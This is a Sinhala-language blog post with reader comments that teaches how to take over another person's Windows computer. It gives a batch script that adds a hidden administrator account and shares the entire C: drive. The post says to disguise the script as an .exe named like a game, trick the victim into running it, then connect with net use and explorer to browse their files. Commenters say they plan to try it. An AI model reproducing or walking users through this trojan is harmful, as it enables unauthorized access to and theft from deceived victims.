ලොවෙත් නෑ ලොවි ගහෙත් නෑ...මෙන්න HACKING...!!

ඔන්න කිව්වා වගේම ආවා අද අලුත් වැඩ කෑල්ලකුත් අරගෙන..මගේ ලග ඔය දේස පාලුවො වගේ බොරු නෑනේ..කිව්වොත් කිව්වා..ගොඩ කාලෙකින් ආව නිසා බ්ලොග් එකට අලුත් ඇඳුමක් එහෙම අන්දලා ගත්තා..ටිකක් අඳුරුයි වගේ නේ..කමක් නෑ..මගේ නම් කැමතිම පාට කලුයි සුදුයි..අපේ ජිවිතත් ඉතින් හරියට කළු සුදු චිත්තරපටි වගේනේ..හීහී..ඒක නෙමෙයි..අනුරාධ කිව්වානේ මට රැඩිකල් අදහස් තියෙන්නේ කියලා..මම ඒ විදියටලු ලියන්නේ...ඇත්තටම මොකක්ද අප්පා මේ රැඩිකල් කියන්නේ..ඒ වෙලාවෙ මම අහන්න ගියෙත් නෑ චාටර් නිසා..හැබැයි ඉතින් අනුරාධ කියනවානම් බොරු වෙන්නත් බෑ.කොහොම කොහොම හරි යාලුවෝ සැට් එකෙන් නම් පට්ට කමෙන්ට්ස් හම්බුනා..හරි..අටුවා ටීකා ටිප්පිනි ඕනේ නෑනේ..අපි කෙලින්ම වැඩේට බහිමු..



මම අද කියලා දෙන්න යන්නේ ටිකක් විතර බරපතල වැඩක්..ඔයගොල්ලෝ ඉස්සෙල්ලම තමන්ගේම තව කොම්පීතරේකට දාලා බලන්න..ඊට පස්සේ අව්ලක් නෑ නෑ වගේනම් මටත් අව්ලක් නෑ..හේහේ...වැඩේ සීරියස් හොඳේ..අද මම කියන්නේ HACK කරන විදියක් ගැන..හැක් කිව්වමත් කස්ටිය ඉතින් කට ඇරන් බලනවානේ..ගොඩක් කස්ටිය කැමතිනේ අනිත් අයගේ එව්වා හැක් කොරන්න..හැබැයි අනිසි විදියට යොදා ගත්තෝත් වැඩෙත් කැතැයි, ප්‍රතිපලත් භයානකයි, පාප කර්මයත් හරි ප්‍රබලයි...කොහොම හරි මම කියලා දෙන්නම් පොඩි වැඩක්..වැඩේ ගැන මට 100% sure කරන්න බෑ..මමත් මේක කියෙව්වේ project එකකින්..මම තාම කරලා බැලුවේ නෑ මොකද මට අවශ්‍යතාවක් ඇවිත් නැති නිසා..මෙන්න මේකයි ක්‍රමේ..

මේක කරන්නේ batch ෆයිල් යොදාගෙන..බැච් ෆයිල් හදාගන්න හරි ලේසියි..note pad එකේ ටයිප් කොරලා .bat එක්ස්ටෙන්ශන් එකෙන් save කරාම හරි..

හරි..පළවෙනි පියවර තමා හැක් කරන්න ඕන මනුස්සයාගේ IP address එක උස්සන එක..ඒක ඉතින් ආපු email එකකින් ගන්න පුලුවන්..ඒක ගන්න හැටි කියවන්න මෙන්න මෙතනට ගිහින් ඒ ලිපිය කියවන්න.

දැන් අපි ඒ මනුස්සයාගේ IP එකත් දන්නවානේ..දැන් ඊළග පියවර.note pad එක open කරගෙන මෙන්න මේ කෝඩ් ටික ටයිප් කරන්න..

net user mrvampire /add
net localgroup administrators mrvampire /add
net share system=C:\ /unlimited
net send youriphere


 mrvampire කියන තැන ඔයගොල්ලොන්ට කැමති වචනයක් ටයිප් කරාට කමක් නෑ..හැබැයි දෙවෙනි පේලියෙත් ඒ වචනෙම ටයිප් කරන්න..ඊට පස්සේ youriphere කියන තැන ඔයගොල්ලන්ගේ IP එක ටයිප් කරන්න..ඒකට ඉතින් command prompt එකට ගිහින් ipconfig කියලා ටයිප් කරලා enter කරන්න..ඔතකොට එනවා..

දැන් ඉතින් ෆයිල් එක සේව් කරගන්න .bat කියලා..මතක ඇතුව Save as type : All Files කියලා මාරු කරන්න..

හැක් කරද්දි සැක නොහිතෙන විදියට කරන්නත් එපාය..bat ෆයිල් එකක් දැක්කම නිකන් සැකයි සැකයි වගේනේ.ඒක නිසා බැච් ෆයිල් එක .exe එකකට convert කරගන්න..ඒකට ඉතින් මේ වගේ එකක් ඩව්න්ලෝඩ් කරගන්න ඕනේ..නැත්නම් ගූගල් කරොත් free batch compliers කියලා ඕනේ තරම් එනවා..

ඊට පස්සේ ඉතින් ඒ ෆයිල් එක යවන්න තියෙන්නේ..ඒකත් ඉතින් සැක නොහිතෙන විදියට යවන්න ඕනේ..game.exe කියලා හරි read.exe කියලා හරි කැමති විදියකට save කරලා කොහොම හරි ඕපන් කරව ගන්න ඕනේ..ඊට පස්සේ ඒ පුද්ගලයා ඒක ඕපන් කරාම අපිට මැසේජ් එකක් එයි..ඊට පස්සේ අපි අපේ command prompt එක ඕපන් කරගෙන පල්ලෙහා තියන code එක ටයිප් කරගන්න ඕනේ..

 net use \\victimip mrvampire
  explorer \\victimip\system


මතක තියාගන්න mrvampire කියන තැන අපි අර මුලින් දාගත්තු අපි කැමති වචනය තමයි ටයිප් කරන්න ඕනේ..දැන් වැඩේ ඉවරයි..කරලා බලන්න..බලලා කමෙන්ට් එකකුත් දාන්න..

ලියුවේ : Unknown ~ Ravindu Ariyawansa

කමෙන්ට් එකක් දාලා යන්න අමතක කරන්න එපා..

 

4 comments:

  1. පට්ට.මමත් ආසයි හැක් කරන්න..මේක ට්‍ර‍යි කරලා බලන්නමි..ස්තූතියි..

    ReplyDelete
  2. එල..හැබැයි වැරදි දෙයකට එහෙම පාවිච්චි කරන්න එපා..අත්හදා බලන්න විතරක් කරන්න

    ReplyDelete
  3. බලමුකෝ ට්‍රයි කරලා!

    ReplyDelete
  4. අරියෝ!!!මේක වින්ඩොස් හත පරිගනකයක සල්ලම් කරන්න පුලුවන්ද අවුලක් නෑතුව??(හනිකට ප්‍රතිචාරයක් බලපොරොත්තු වෙමී)

    ReplyDelete